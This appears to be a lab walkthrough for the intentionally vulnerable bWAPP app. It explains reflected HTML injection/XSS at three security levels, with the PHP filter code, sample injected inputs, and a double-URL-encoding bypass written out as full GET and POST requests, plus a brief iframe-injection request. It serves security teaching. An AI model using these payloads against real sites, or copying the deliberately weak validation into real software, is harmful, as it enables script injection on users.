Embedded Files
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
Stored XSS
Reflective XSS
DOM-based XSS
Server XSS
Client XSS
htmli_get.php - Reflective XSS using HTTP GET and HTTP POST Method
htmli_get.php - Reflective XSS using HTTP GET and HTTP POST Method
Security Level Low
// Input Validation
function no_check($data) {
return $data;
}
Attack
Because there is no input validation in place, injection is quite easily done. E.g., if we enter following values:
firstname: <a href="http://www.google.com"><h1>Click Me</h1></a>
lastname : Security Level: Low
the resulting HTTP-Request (GET Method) is:
GET /bWAPP/htmli_get.php?firstname=<a+href%3D"http%3A%2F%2Fwww.google.com"><h1>Click+Me<%2Fh1><%2Fa>&lastname=Security+Level%3A+Low&form=submit HTTP/1.0
the resulting HTTP-Request (POST Method) is:
POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
firstname=%3Ca+href%3D%22http%3A%2F%2Fwww.google.com%22%3E%3Ch1%3EClick+Me%3C%2Fh1%3E%3C%2Fa%3E&lastname=Security+Level%3A+Low&form=submit
Security Level Low: no_check($data)
vulnerable: no input validation
Security Level Medium
// Input Validation
function xss_check_1($data) {
// Converts only "<" and ">" to HTLM entities
$input = str_replace("<", "<", $data);
$input = str_replace(">", ">", $input);
// Failure is an option
// Bypasses double encoding attacks
// <script>alert(0)</script>
// %3Cscript%3Ealert%280%29%3C%2Fscript%3E
// %253Cscript%253Ealert%25280%2529%253C%252Fscript%253E
$input = urldecode($input);
return $input;
}
Attack
The input validation does not protect against double url-encoded input data. E.g., if we enter following values:
firstname: %3Ca+href="http://www.google.com"%3E%3Ch1%3EClick+Me%3C/h1%3E%3C/a%3E
lastname : Security Level: Medium
the resulting HTTP-Request(GET Method) is:
GET /bWAPP/htmli_get.php?firstname=%253Ca%2Bhref%3D"http%3A%2F%2Fwww.google.com"%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit HTTP/1.0
the resulting HTTP-Request(POST Method) is:
POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
firstname=%253Ca%2Bhref%3D%22http%3A%2F%2Fwww.google.com%22%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit
Security Level Medium: xss_check_1($data)
vulnerable: insufficient input validation
uses urldecode() for already url-decoded data ($_GET), thus allowing double url-encoded data
Security Level High
// Input Validation
function xss_check_3($data, $encoding = "UTF-8") {
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&'
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
Attack
At the moment, there is no known way to circumvent this input validation, if used in the right context.
Security Level High: xss_check_3($data)
no known vulnerability if used in the right context
iframei.php - iFrame Injection
iframei.php - iFrame Injection
Security Level Low
GET /bWAPP/iframei.php?ParamUrl=https://www.bing.com&ParamWidth=250&ParamHeight=250 HTTP/1.0
Google Sites
Report abuse